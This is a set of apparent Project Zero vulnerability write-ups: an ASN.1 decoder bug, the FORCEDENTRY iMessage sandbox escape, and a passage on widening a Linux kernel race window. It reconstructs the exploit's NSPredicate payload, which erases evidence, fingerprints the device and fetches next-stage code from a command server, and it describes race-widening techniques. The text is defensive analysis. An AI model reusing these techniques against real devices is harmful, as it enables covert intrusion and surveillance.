+                       state->place = beforeEndOfContents;

+               }

+               if(state->contents_length == 1) {

+                       /* skip over (unused) remainder byte */

+                       return 1;

+               }

+               else {

+                       return 0;

+               }

     }

In the context of all the other changes in this initial import this change looks much less suspicious than I first thought. My guess is that the Apple developers thought that Mozilla had missed handling the case of a bitstring with only the unused-bits bytes and attempted to add support for it. It looks like the state->pending == 0 conditional must have been Mozilla's check for handling a 0-length bitstring so therefore it was quite reasonable to think that the way it was handling that case by NULLing out item->data was the right thing to do, so it must also be correct to add the contents_length == 1 case here.

In reality the contents_length == 1 case was handled perfectly correctly anyway in sec_asn1d_parse_more_bit_string, but it wasn't unreasonable to assume that it had been overlooked based on what looked like a special case handling for the missing unused-bits byte in sec_asn1d_parse_bit_string.

The fix for the bug was simply to revert the change made during the initial import 18 years ago, making the dangerous but unreachable code unreachable once more:

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

Conclusions

Forking complicated code is complicated. In this case it took almost two decades to in the end just revert a change made during import. Even verifying whether this revert is correct is really hard.

The Mozilla and Apple codebases have continued to diverge since 2003. As I discovered slightly too late to be useful, the Mozilla code now has more comments trying to explain the decoder's "novel" memory safety approach.

Rewriting this code to be more understandable (and maybe even memory safe) is also distinctly non-trivial. The code doesn't just implement ASN.1 decoding; it also has to support safely decoding incorrectly encoded data, as described by this verbatim comment for example:

 /*

  * Okay, this is a hack.  It *should* be an error whether

  * pending is too big or too small, but it turns out that

  * we had a bug in our *old* DER encoder that ended up

  * counting an explicit header twice in the case where

  * the underlying type was an ANY.  So, because we cannot

  * prevent receiving these (our own certificate server can

  * send them to us), we need to be lenient and accept them.

  * To do so, we need to pretend as if we read all of the

  * bytes that the header said we would find, even though

  * we actually came up short.

  */

Verifying that a rewritten, simpler decoder also handles every hard-coded edge case correctly probably leads to it not being so simple after all.

FORCEDENTRY: Sandbox Escape

By: Anonymous
31 March 2022 at 16:00

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. Any editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Late last year we published a writeup of the initial remote code execution stage of FORCEDENTRY, the zero-click iMessage exploit attributed by Citizen Lab to NSO. By sending a .gif iMessage attachment (which was really a PDF) NSO were able to remotely trigger a heap buffer overflow in the ImageIO JBIG2 decoder. They used that vulnerability to bootstrap a powerful weird machine capable of loading the next stage in the infection process: the sandbox escape.

In this post we'll take a look at that sandbox escape. It's notable for using only logic bugs. In fact it's unclear where the features that it uses end and the vulnerabilities which it abuses begin. Both current and upcoming state-of-the-art mitigations such as Pointer Authentication and Memory Tagging have no impact at all on this sandbox escape.

An observation

During our initial analysis of the .gif file Samuel noticed that rendering the image appeared to leak memory. Running the heap tool after releasing all the associated resources gave the following output:

$ heap $pid

------------------------------------------------------------

All zones: 4631 nodes (826336 bytes)        

             

   COUNT    BYTES     AVG   CLASS_NAME   TYPE   BINARY          

   =====    =====     ===   ==========   ====   ======        

    1969   469120   238.3   non-object

     825    26400    32.0   JBIG2Bitmap  C++   CoreGraphics

heap was able to determine that the leaked memory contained JBIG2Bitmap objects.

Using the -address option we could find all the individual leaked bitmap objects:

$ heap -address JBIG2Bitmap $pid

and dump them out to files. One of those objects was quite unlike the others:

$ hexdump -C dumpXX.bin | head

00000000  62 70 6c 69 73 74 30 30  |bplist00|

...

00000018        24 76 65 72 73 69  |  $versi|

00000020  6f 6e 59 24 61 72 63 68  |onY$arch|

00000028  69 76 65 72 58 24 6f 62  |iverX$ob|

00000030  6a 65 63 74 73 54 24 74  |jectsT$t|

00000038  6f 70                    |op      |

00000040        4e 53 4b 65 79 65  |  NSKeye|

00000048  64 41 72 63 68 69 76 65  |dArchive|

It's clearly a serialized NSKeyedArchiver. Definitely not what you'd expect to see in a JBIG2Bitmap object. Running strings we see plenty of interesting things (noting that the URL below is redacted):

Objective-C class and selector names:

NSFunctionExpression

NSConstantValueExpression

NSConstantValue

expressionValueWithObject:context:

filteredArrayUsingPredicate:

_web_removeFileOnlyAtPath:

context:evaluateMobileSubscriberIdentity:

performSelectorOnMainThread:withObject:waitUntilDone:

...

The name of the file which delivered the exploit:

XXX.gif

Filesystems paths:

/tmp/com.apple.messages

/System/Library/PrivateFrameworks/SlideshowKit.framework/Frameworks/OpusFoundation.framework

a URL:

https://XXX.cloudfront.net/YYY/ZZZ/megalodon?AAA

Using plutil we can convert the bplist00 binary format to XML. Performing some post-processing and cleanup we can see that the top-level object in the NSKeyedArchiver is a serialized NSFunctionExpression object.

NSExpression NSPredicate NSExpression

If you've ever used Core Data or tried to filter a Objective-C collection you might have come across NSPredicates. According to Apple's public documentation they are used "to define logical conditions for constraining a search for a fetch or for in-memory filtering".

For example, in Objective-C you could filter an NSArray object like this:

  NSArray* names = @[@"one", @"two", @"three"];

  NSPredicate* pred;

  pred = [NSPredicate predicateWithFormat:

            @"SELF beginswith[c] 't'"];

  NSLog(@"%@", [names filteredArrayUsingPredicate:pred]);

The predicate is "SELF beginswith[c] 't'". This prints an NSArray containing only "two" and "three".

[NSPredicate predicateWithFormat] builds a predicate object by parsing a small query language, a little like an SQL query.

NSPredicates can be built up from NSExpressions, connected by NSComparisonPredicates (like less-than, greater-than and so on.)

NSExpressions themselves can be fairly complex, containing aggregate expressions (like "IN" and "CONTAINS"), subqueries, set expressions, and, most interestingly, function expressions.

Prior to 2007 (in OS X 10.4 and below) function expressions were limited to just the following five extra built-in methods: sum, count, min, max, and average.

But starting in OS X 10.5 (which would also be around the launch of iOS in 2007) NSFunctionExpressions were extended to allow arbitrary method invocations with the FUNCTION keyword:

  "FUNCTION('abc', 'stringByAppendingString', 'def')" => @"abcdef"

FUNCTION takes a target object, a selector and an optional list of arguments then invokes the selector on the object, passing the arguments. In this case it will allocate an NSString object @"abc" then invoke the stringByAppendingString: selector passing the NSString @"def", which will evaluate to the NSString @"abcdef".

In addition to the FUNCTION keyword there's CAST which allows full reflection-based access to all Objective-C types (as opposed to just being able to invoke selectors on literal strings and integers):

  "FUNCTION(CAST('NSFileManager', 'Class'), 'defaultManager')"

Here we can get access to the NSFileManager class and call the defaultManager selector to get a reference to a process's shared file manager instance.

These keywords exist in the string representation of NSPredicates and NSExpressions. Parsing those strings involves creating a graph of NSExpression objects, NSPredicate objects and their subclasses like NSFunctionExpression. It's a serialized version of such a graph which is present in the JBIG2 bitmap.

NSPredicates using the FUNCTION keyword are effectively Objective-C scripts. With some tricks it's possible to build nested function calls which can do almost anything you could do in procedural Objective-C. Figuring out some of those tricks was the key to the 2019 Real World CTF DezhouInstrumenz challenge, which would evaluate an attacker supplied NSExpression format string. The writeup by the challenge author is a great introduction to these ideas and I'd strongly recommend reading that now if you haven't. The rest of this post builds on the tricks described in that post.

A tale of two parts

The only job of the JBIG2 logic gate machine described in the previous blog post is to cause the deserialization and evaluation of an embedded NSFunctionExpression. No attempt is made to get native code execution, ROP, JOP or any similar technique.

Prior to iOS 14.5 the isa field of an Objective-C object was not protected by Pointer Authentication Codes (PAC), so the JBIG2 machine builds a fake Objective-C object with a fake isa such that the invocation of the dealloc selector causes the deserialization and evaluation of the NSFunctionExpression. This is very similar to the technique used by Samuel in the 2020 SLOP post.

This NSFunctionExpression has two purposes:

Firstly, it allocates and leaks an ASMKeepAlive object then tries to cover its tracks by finding and deleting the .gif file which delivered the exploit.

Secondly, it builds a payload NSPredicate object then triggers a logic bug to get that NSPredicate object evaluated in the CommCenter process, reachable from the IMTranscoderAgent sandbox via the com.apple.commcenter.xpc NSXPC service.

Let's look at those two parts separately:

Covering tracks

The outer level NSFunctionExpression calls performSelectorOnMainThread:withObject:waitUntilDone which in turn calls makeObjectsPerformSelector:@"expressionValueWithObject:context:" on an NSArray of four NSFunctionExpressions. This allows the four independent NSFunctionExpressions to be evaluated sequentially.

With some manual cleanup we can recover pseudo-Objective-C versions of the serialized NSFunctionExpressions.

The first one does this:

[[AMSKeepAlive alloc] initWithName:"KA"]

This allocates and then leaks an AppleMediaServices KeepAlive object. The exact purpose of this is unclear.

The second entry does this:

[[NSFileManager defaultManager] _web_removeFileOnlyAtPath:

  [@"/tmp/com.apple.messages" stringByAppendingPathComponent:

    [ [ [ [

            [NSFileManager defaultManager]

            enumeratorAtPath: @"/tmp/com.apple.messages"

          ]

          allObjects

        ]

        filteredArrayUsingPredicate:

          [

            [NSPredicate predicateWithFormat:

              [

                [@"SELF ENDSWITH '"

                  stringByAppendingString: "XXX.gif"]

                stringByAppendingString: "'"

      ]   ] ] ]

      firstObject

    ]

  ]

]

Reading these single expression NSFunctionExpressions is a little tricky; breaking that down into a more procedural form it's equivalent to this:

NSFileManager* fm = [NSFileManager defaultManager];

NSDirectoryEnumerator* dir_enum;

dir_enum = [fm enumeratorAtPath: @"/tmp/com.apple.messages"]

NSArray* allTmpFiles = [dir_enum allObjects];

NSString* filter;

filter = ["@"SELF ENDSWITH '" stringByAppendingString: "XXX.gif"];

filter = [filter stringByAppendingString: "'"];

NSPredicate* pred;

pred = [NSPredicate predicateWithFormat: filter]

NSArray* matches;

matches = [allTmpFiles filteredArrayUsingPredicate: pred];

NSString* gif_subpath = [matches firstObject];

NSString* root = @"/tmp/com.apple.messages";

NSString* full_path;

full_path = [root stringByAppendingPathComponent: gifSubpath];

[fm _web_removeFileOnlyAtPath: full_path];

This finds the XXX.gif file used to deliver the exploit which iMessage has stored somewhere under the /tmp/com.apple.messages folder and deletes it.

The other two NSFunctionExpressions build a payload and then trigger its evaluation in CommCenter. For that we need to look at NSXPC.

NSXPC

NSXPC is a semi-transparent remote-procedure-call mechanism for Objective-C. It allows the instantiation of proxy objects in one process which transparently forward method calls to the "real" object in another process:

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html

I say NSXPC is only semi-transparent because it does enforce some restrictions on what objects are allowed to traverse process boundaries. Any object "exported" via NSXPC must also define a protocol which designates which methods can be invoked and the allowable types for each argument. The NSXPC programming guide further explains the extra handling required for methods which require collections and other edge cases.

The low-level serialization used by NSXPC is the same explored by Natalie Silvanovich in her 2019 blog post looking at the fully-remote attack surface of the iPhone. An important observation in that post was that subclasses of classes with any level of inheritance are also allowed, as is always the case with NSKeyedUnarchiver deserialization.

This means that any protocol object which declares a particular type for a field will also, by design, accept any subclass of that type.

The logical extreme of this would be that a protocol which declared an argument type of NSObject would allow any subclass, which is the vast majority of all Objective-C classes.

Grep to the rescue

This is fairly easy to analyze automatically. Protocols are defined statically so we can just find them and check each one. Tools like RuntimeBrowser and classdump can parse the static protocol definitions and output human-readable source code. Grepping the output of RuntimeBrowser like this is sufficient to find dozens of cases of NSObject pointers in Objective-C protocols:

  $ egrep -Rn "\(NSObject \*\)arg" *

Not all the results are necessarily exposed via NSXPC, but some clearly are, including the following two matches in CoreTelephony.framework:

Frameworks/CoreTelephony.framework/\

CTXPCServiceSubscriberInterface-Protocol.h:39:

-(void)evaluateMobileSubscriberIdentity:

        (CTXPCServiceSubscriptionContext *)arg1

       identity:(NSObject *)arg2

       completion:(void (^)(NSError *))arg3;

Frameworks/CoreTelephony.framework/\

CTXPCServiceCarrierBundleInterface-Protocol.h:13:

-(void)setWiFiCallingSettingPreferences:

         (CTXPCServiceSubscriptionContext *)arg1

       key:(NSString *)arg2

       value:(NSObject *)arg3

       completion:(void (^)(NSError *))arg4;

evaluateMobileSubscriberIdentity string appears in the list of selector-like strings we first saw when running strings on the bplist00. Indeed, looking at the parsed and beautified NSFunctionExpression we see it doing this:

[ [ [CoreTelephonyClient alloc] init]

  context:X

  evaluateMobileSubscriberIdentity:Y]

This is a wrapper around the lower-level NSXPC code and the argument passed as Y above to the CoreTelephonyClient method corresponds to the identity:(NSObject *)arg2 argument passed via NSXPC to CommCenter (which is the process that hosts com.apple.commcenter.xpc, the NSXPC service underlying the CoreTelephonyClient). Since the parameter is explicitly named as NSObject* we can in fact pass any subclass of NSObject*, including an NSPredicate! Game over?

Parsing vs Evaluation

It's not quite that easy. The DezhouInstrumentz writeup discusses this attack surface and notes that there's an extra, specific mitigation. When an NSPredicate is deserialized by its initWithCoder: implementation it sets a flag which disables evaluation of the predicate until the allowEvaluation method is called.

So whilst you certainly can pass an NSPredicate* as the identity argument across NSXPC and get it deserialized in CommCenter, the implementation of evaluateMobileSubscriberIdentity: in CommCenter is definitely not going to call allowEvaluation:  to make the predicate safe for evaluation then evaluateWithObject: and then evaluate it.

Old techniques, new tricks

From the exploit we can see that they in fact pass an NSArray with two elements:

[0] = AVSpeechSynthesisVoice

[1] = PTSection {rows = NSArray { [0] = PTRow() }

The first element is an AVSpeechSynthesisVoice object and the second is a PTSection containing a single PTRow. Why?

PTSection and PTRow are both defined in the PrototypeTools private framework. PrototypeTools isn't loaded in the CommCenter target process. Let's look at what happens when an AVSpeechSynthesisVoice is deserialized:

Finding a voice

AVSpeechSynthesisVoice is implemented in AVFAudio.framework, which is loaded in CommCenter:

$ sudo vmmap `pgrep CommCenter` | grep AVFAudio

__TEXT  7ffa22c4c000-7ffa22d44000 r-x/r-x SM=COW \

/System/Library/Frameworks/AVFAudio.framework/Versions/A/AVFAudio

Assuming that this was the first time that an AVSpeechSynthesisVoice object was created inside CommCenter (which is quite likely) the Objective-C runtime will call the initialize method on the AVSpeechSynthesisVoice class before instantiating the first instance.

[AVSpeechSynthesisVoice initialize] has a dispatch_once block with the following code:

NSBundle* bundle;

bundle = [NSBundle bundleWithPath:

                     @"/System/Library/AccessibilityBundles/\

                         AXSpeechImplementation.bundle"];

if (![bundle isLoaded]) {

    NSError err;

    [bundle loadAndReturnError:&err]

}

So sending a serialized AVSpeechSynthesisVoice object will cause CommCenter to load the /System/Library/AccessibilityBundles/AXSpeechImplementation.bundle library. With some scripting using otool -L to list dependencies we can  find the following dependency chain from AXSpeechImplementation.bundle to PrototypeTools.framework:

['/System/Library/AccessibilityBundles/\

    AXSpeechImplementation.bundle/AXSpeechImplementation',

 '/System/Library/AccessibilityBundles/\

    AXSpeechImplementation.bundle/AXSpeechImplementation',

 '/System/Library/PrivateFrameworks/\

    AccessibilityUtilities.framework/AccessibilityUtilities',

 '/System/Library/PrivateFrameworks/\

    AccessibilitySharedSupport.framework/AccessibilitySharedSupport',

'/System/Library/PrivateFrameworks/Sharing.framework/Sharing',

'/System/Library/PrivateFrameworks/\

    PrototypeTools.framework/PrototypeTools']

This explains how the deserialization of a PTSection will succeed. But what's so special about PTSections and PTRows?

Predicated Sections

[PTRow initwithcoder:] contains the following snippet:

  self->condition = [coder decodeObjectOfClass:NSPredicate

                           forKey:@"condition"]

  [self->condition allowEvaluation]

This will deserialize an NSPredicate object, assign it to the PTRow member variable condition and call allowEvaluation. This is meant to indicate that the deserializing code considers this predicate safe, but there's no attempt to perform any validation on the predicate contents here. They then need one more trick to find a path to which will additionally evaluate the PTRow's condition predicate.

Here's a snippet from [PTSection initWithCoder:]:

NSSet* allowed = [NSSet setWithObjects: @[PTRow]]

id* rows = [coder decodeObjectOfClasses:allowed forKey:@"rows"]

[self initWithRows:rows]

This deserializes an array of PTRows and passes them to [PTSection initWithRows] which assigns a copy of the array of PTRows to PTSection->rows then calls [self _reloadEnabledRows] which in turn passes each row to [self _shouldEnableRow:]

_shouldEnableRow:row {

  if (row->condition) {

    return [row->condition evaluateWithObject: self->settings]

  }

}

And thus, by sending a PTSection containing a single PTRow with an attached condition NSPredicate they can cause the evaluation of an arbitrary NSPredicate, effectively equivalent to arbitrary code execution in the context of CommCenter.

Payload 2

The NSPredicate attached to the PTRow uses a similar trick to the first payload to cause the evaluation of six independent NSFunctionExpressions, but this time in the context of the CommCenter process. They're presented here in pseudo Objective-C:

Expression 1

[  [CaliCalendarAnonymizer sharedAnonymizedStrings]

   setObject:

     @[[NSURLComponents

         componentsWithString:

         @"https://cloudfront.net/XXX/XXX/XXX?aaaa"], '0']

   forKey: @"0"

]

The use of [CaliCalendarAnonymizer sharedAnonymizedStrings] is a trick to enable the array of independent NSFunctionExpressions to have "local variables". In this first case they create an NSURLComponents object which is used to build parameterised URLs. This URL builder is then stored in the global dictionary returned by [CaliCalendarAnonymizer sharedAnonymizedStrings] under the key "0".

Expression 2

[[NSBundle

  bundleWithPath:@"/System/Library/PrivateFrameworks/\

     SlideshowKit.framework/Frameworks/OpusFoundation.framework"

 ] load]

This causes the OpusFoundation library to be loaded. The exact reason for this is unclear, though the dependency graph of OpusFoundation does include AuthKit which is used by the next NSFunctionExpression. It's possible that this payload is generic and might also be expected to work when evaluated in processes where AuthKit isn't loaded.

Expression 3

[ [ [CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"0" ]

  setQueryItems:

    [ [ [NSArray arrayWithObject:

                 [NSURLQueryItem

                    queryItemWithName: @"m"

                    value:[AKDevice _hardwareModel] ]

                                 ] arrayByAddingObject:

                 [NSURLQueryItem

                    queryItemWithName: @"v"

                    value:[AKDevice _buildNumber] ]

                                 ] arrayByAddingObject:

                 [NSURLQueryItem

                    queryItemWithName: @"u"

                    value:[NSString randomString]]

]

This grabs a reference to the NSURLComponents object stored under the "0" key in the global sharedAnonymizedStrings dictionary then parameterizes the HTTP query string with three values:

  [AKDevice _hardwareModel] returns a string like "iPhone12,3" which determines the exact device model.

  [AKDevice _buildNumber] returns a string like "18A8395" which in combination with the device model allows determining the exact firmware image running on the device.

  [NSString randomString] returns a decimal string representation of a 32-bit random integer like "394681493".

Expression 4

[ [CaliCalendarAnonymizer sharedAnonymizedString]

  setObject:

    [NSPropertyListSerialization

      propertyListWithData:

        [[[NSData

             dataWithContentsOfURL:

               [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

                 objectForKey:@"0"] URL]

          ] AES128DecryptWithPassword:NSData(XXXX)

         ]  decompressedDataUsingAlgorithm:3 error:]

       options: Class(NSConstantValueExpression)

      format: Class(NSConstantValueExpression)

      errors:Class(NSConstantValueExpression)

  ]

  forKey:@"1"

]

The innermost reference to sharedAnonymizedStrings here grabs the NSURLComponents object and builds the full url from the query string parameters set last earlier. That url is passed to [NSData dataWithContentsOfURL:] to fetch a data blob from a remote server.

That data blob is decrypted with a hardcoded AES128 key, decompressed using zlib then parsed as a plist. That parsed plist is stored in the sharedAnonymizedStrings dictionary under the key "1".

Expression 5

[ [[NSThread mainThread] threadDictionary]

  addEntriesFromDictionary:

    [[CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"1"]

]

This copies all the keys and values from the "next-stage" plist into the main thread's theadDictionary.

Expression 6

[ [NSExpression expressionWithFormat:

    [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

      objectForKey:@"1"]

    objectForKey: @"a"]

  ]

  expressionValueWithObject:nil context:nil

]

Finally, this fetches the value of the "a" key from the next-stage plist, parses it as an NSExpression string and evaluates it.

End of the line

At this point we lose the ability to follow the exploit. The attackers have escaped the IMTranscoderAgent sandbox, requested a next-stage from the command and control server and executed it, all without any memory corruption or dependencies on particular versions of the operating system.

In response to this exploit iOS 15.1 significantly reduced the computational power available to NSExpressions:

NSExpression immediately forbids certain operations that have significant side effects, like creating and destroying objects. Additionally, casting string class names into Class objects with NSConstantValueExpression is deprecated.

In addition the PTSection and PTRow objects have been hardened with the following check added around the parsing of serialized NSPredicates:

if (os_variant_allows_internal_security_policies(

      "com.apple.PrototypeTools") {

  [coder decodeObjectOfClass:NSPredicate forKey:@"condition]

...

Object deserialization across trust boundaries still presents an enormous attack surface however.

Conclusion

Perhaps the most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox. With just two tricks (NSObject pointers in protocols and library loading gadgets) it's likely possible to attack almost every initWithCoder implementation in the dyld_shared_cache. There are presumably many other classes in addition to NSPredicate and NSExpression which provide the building blocks for logic-style exploits.

The expressive power of NSXPC just seems fundamentally ill-suited for use across sandbox boundaries, even though it was designed with exactly that in mind. The attack surface reachable from inside a sandbox should be minimal, enumerable and reviewable. Ideally only code which is required for correct functionality should be reachable; it should be possible to determine exactly what that exposed code is and the amount of exposed code should be small enough that manually reviewing it is tractable.

NSXPC requiring developers to explicitly add remotely-exposed methods to interface protocols is a great example of how to make the attack surface enumerable - you can at least find all the entry points fairly easily. However the support for inheritance means that the attack surface exposed there likely isn't reviewable; it's simply too large for anything beyond a basic example.

Refactoring these critical IPC boundaries to be more prescriptive - only allowing a much narrower set of objects in this case - would be a good step towards making the attack surface reviewable. This would probably require fairly significant refactoring for NSXPC; it's built around natively supporting the Objective-C inheritance model and is used very broadly. But without such changes the exposed attack surface is just too large to audit effectively.

The advent of Memory Tagging Extensions (MTE), likely shipping in multiple consumer devices across the ARM ecosystem this year, is a big step in the defense against memory corruption exploitation. But attackers innovate too, and are likely already two steps ahead with a renewed focus on logic bugs. This sandbox escape exploit is likely a sign of the shift we can expect to see over the next few years if the promises of MTE can be delivered. And this exploit was far more extensible, reliable and generic than almost any memory corruption exploit could ever hope to be.

Racing against the clock -- hitting a tiny kernel race window

By: Ryan
24 March 2022 at 20:51

TL;DR:

How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:

  • use a cache miss to widen the race window a little bit
  • make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
  • make sure that the wakeup triggered by the timerfd has to churn through 50000 waitqueue items created by epoll

Racing one thread against a timer also avoids accumulating timing variations from two threads in each race attempt - hence the title. On the other hand, it also means you now have to deal with how hardware timers actually work, which introduces its own flavors of weird timing variations.

Introduction

I recently discovered a race condition (https://crbug.com/project-zero/2247) in the Linux kernel. (While trying to explain to someone how the fix for CVE-2021-0920 worked - I was explaining why the Unix GC is now safe, and then got confused because I couldn't actually figure out why it's safe after that fix, eventually realizing that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT, which would make it possible to preempt a thread with another thread, as I described at LSSEU2019.

This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though, I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration) because that's the part I was curious about.

This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs.

The UAF reproducer is in our bugtracker.

The bug

In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS file descriptor passing), the kernel tries to figure out whether it can account for all references to some file by comparing the file's refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.

(The same pattern also appears for files as an optimization in __fdget_pos(), see this LKML thread.)

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can't detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero. For example, when this happens in the dup() syscall, the resulting reference will then be installed in the FD table and be available for subsequent syscalls.

When the garbage collector (GC) believes that it has exclusive access to a file, it will perform operations on that file that violate the locking rules used in normal socket-related syscalls such as recvmsg() - unix_stream_read_generic() assumes that queued SKBs can only be removed under the ->iolock mutex, but the GC removes queued SKBs without using that mutex. (Thanks to Xingyu Jin for explaining that to me.)

One way of looking at this bug is that the GC is working correctly - here's a state diagram showing some of the possible states of a struct file, with more specific states nested under less specific ones and with the state transition in the GC marked:

All relevant states are RCU-accessible. An RCU-accessible object can have either a zero refcount or a positive refcount. Objects with a positive refcount can be either live or owned by the garbage collector. When the GC attempts to grab a file, it transitions from the state "live" to the state "owned by GC" by getting exclusive ownership of all references to the file.

While __fget_files() is making an incorrect assumption about the state of the struct file while it is trying to narrow down its possible states - it checks whether get_file_rcu() / get_file_rcu_many() succeeds, which narrows the file's state down a bit but not far enough:

__fget_files() first uses get_file_rcu() to conditionally narrow the state of a file from "any RCU-accessible state" to "any refcounted state". Then it has to narrow the state from "any refcounted state" to "live", but instead it just assumes that they are equivalent.

And this directly leads to how the bug was fixed (there's another follow-up patch, but that one just tries to clarify the code and recoup some of the resulting performance loss) - the fix adds another check in __fget_files() to properly narrow down the state of the file such that the file is guaranteed to be live:

The fix is to properly narrow the state from "any refcounted state" to "live" by checking whether the file is still referenced by a file descriptor table entry.

The fix ensures that a live reference can only be derived from another live reference by comparing with an FD table entry, which is guaranteed to point to a live object.

[Sidenote: This scheme is similar to the one used for struct page - gup_pte_range() also uses the "grab pointer, increment refcount, recheck pointer" pattern for locklessly looking up a struct page from a page table entry while ensuring that new refcounted references can't be created without holding an existing reference. This is really important for struct page because a page can be given back to the page allocator and reused while gup_pte_range() holds an uncounted reference to it - freed pages still have their struct page, so there's no need to delay freeing of the page - so if this went wrong, you'd get a page UAF.]

My initial suggestion was to instead fix the issue by changing how unix_gc() ensures that it has exclusive access, letting it set the file's refcount to zero to prevent turning RCU references into refcounted ones; this would have avoided adding any code in the hot __fget_files() path, but it would have only fixed unix_gc(), not the __fdget_pos() case I discovered later, so it's probably a good thing this isn't how it was fixed:

[Sidenote: In my original bug report I wrote that you'd have to wait an RCU grace period in the GC for this, but that wouldn't be necessary as long as the GC ensures that a reaped socket's refcount never becomes non-zero again.]

The race

There are multiple race conditions involved in exploiting this bug, but by far the trickiest to hit is that we have to race an operation into the tiny race window in the middle of __fget_files() (which can e.g. be reached via dup()), between the file descriptor table lookup and the refcount increment:

static struct file *__fget_files(struct files_struct *files, unsigned int fd,

                                 fmode_t mask, unsigned int refs)

{

        struct file *file;

        rcu_read_lock();

loop:

        file = files_lookup_fd_rcu(files, fd); // race window start

        if (file) {

                /* File object ref couldn't be taken.

                 * dup2() atomicity guarantee is the reason

                 * we loop to catch the new file (or NULL pointer)

                 */

                if (file->f_mode & mask)

                        file = NULL;

                else if (!get_file_rcu_many(file, refs)) // race window end

                        goto loop;

        }

        rcu_read_unlock();

        return file;

}

In this race window, the file descriptor must be closed (to drop the FD's reference to the file) and a unix_gc() run must get past the point where it checks the file's refcount ("total_refs = file_count(u->sk.sk_socket->file)").

In the Debian 5.10.0-9-amd64 kernel at version 5.10.70-1, that race window looks as follows:

<__fget_files+0x1e> cmp    r10,rax

<__fget_files+0x21> sbb    rax,rax

<__fget_files+0x24> mov    rdx,QWORD PTR [r11+0x8]

<__fget_files+0x28> and    eax,r8d

<__fget_files+0x2b> lea    rax,[rdx+rax*8]

<__fget_files+0x2f> mov    r12,QWORD PTR [rax] ; RACE WINDOW START

; r12 now contains file*

<__fget_files+0x32> test   r12,r12

<__fget_files+0x35> je     ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x37> mov    eax,r9d

<__fget_files+0x3a> and    eax,DWORD PTR [r12+0x44] ; LOAD (for ->f_mode)

<__fget_files+0x3f> jne    ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x41> mov    rax,QWORD PTR [r12+0x38] ; LOAD (for ->f_count)

<__fget_files+0x46> lea    rdx,[r12+0x38]

<__fget_files+0x4b> test   rax,rax

<__fget_files+0x4e> je     ffffffff812e3def <__fget_files+0x6f>

<__fget_files+0x50> lea    rcx,[rsi+rax*1]

<__fget_files+0x54> lock cmpxchg QWORD PTR [rdx],rcx ; RACE WINDOW END (on cmpxchg success)

As you can see, the race window is fairly small - around 12 instructions, assuming that the cmpxchg succeeds.

Missing some cache

Luckily for us, the race window contains the first few memory accesses to the struct file; therefore, by making sure that the struct file is not present in the fastest CPU caches, we can widen the race window by as much time as the memory accesses take. The standard way to do this is to use an eviction pattern / eviction set; but instead we can also make the cache line dirty on another core (see Anders Fogh's blogpost for more detail). (I'm not actually sure about the intricacies of how much latency this adds on different manufacturers' CPU cores, or on different CPU generations - I've only tested different versions of my proof-of-concept on Intel Skylake and Tiger Lake. Differences in cache coherency protocols or snooping might make a big difference.)

For the cache line containing the flags and refcount of a struct file, this can be done by, on another CPU, temporarily bumping its refcount up and then changing it back down, e.g. with close(dup(fd)) (or just by accessing the FD in pretty much any way from a multithreaded process).

However, when we're trying to hit the race in __fget_files() via dup(), we don't want any cache misses to occur before we hit the race window - that would slow us down and probably make us miss the race. To prevent that from happening, we can call dup() with a different FD number for a warm-up run shortly before attempting the race. Because we also want the relevant cache line in the FD table to be hot, we should choose the FD number for the warm-up run such that it uses the same cache line of the file descriptor table.

An interruption

Okay, a cache miss might be something like a few dozen or maybe hundred nanoseconds or so - that's better, but it's not great. What else can we do to make this tiny piece of code much slower to execute?

On Android, kernels normally set CONFIG_PREEMPT, which would've allowed abusing the scheduler to somehow interrupt the execution of this code. The way I've done this in the past was to give the victim thread a low scheduler priority and pin it to a specific CPU core together with another high-priority thread that is blocked on a read() syscall on an empty pipe (or eventfd); when data is written to the pipe from another CPU core, the pipe becomes readable, so the high-priority thread (which is registered on the pipe's waitqueue) becomes schedulable, and an inter-processor interrupt (IPI) is sent to the victim's CPU core to force it to enter the scheduler immediately.

One problem with that approach, aside from its reliance on CONFIG_PREEMPT, is that any timing variability in the kernel code involved in sending the IPI makes it harder to actually preempt the victim thread in the right spot.

(Thanks to the Xen security team - I think the first time I heard the idea of using an interrupt to widen a race window might have been from them.)

Setting an alarm

A better way to do this on an Android phone would be to trigger the scheduler not from an IPI, but from an expiring high-resolution timer on the same core, although I didn't get it to work (probably because my code was broken in unrelated ways).

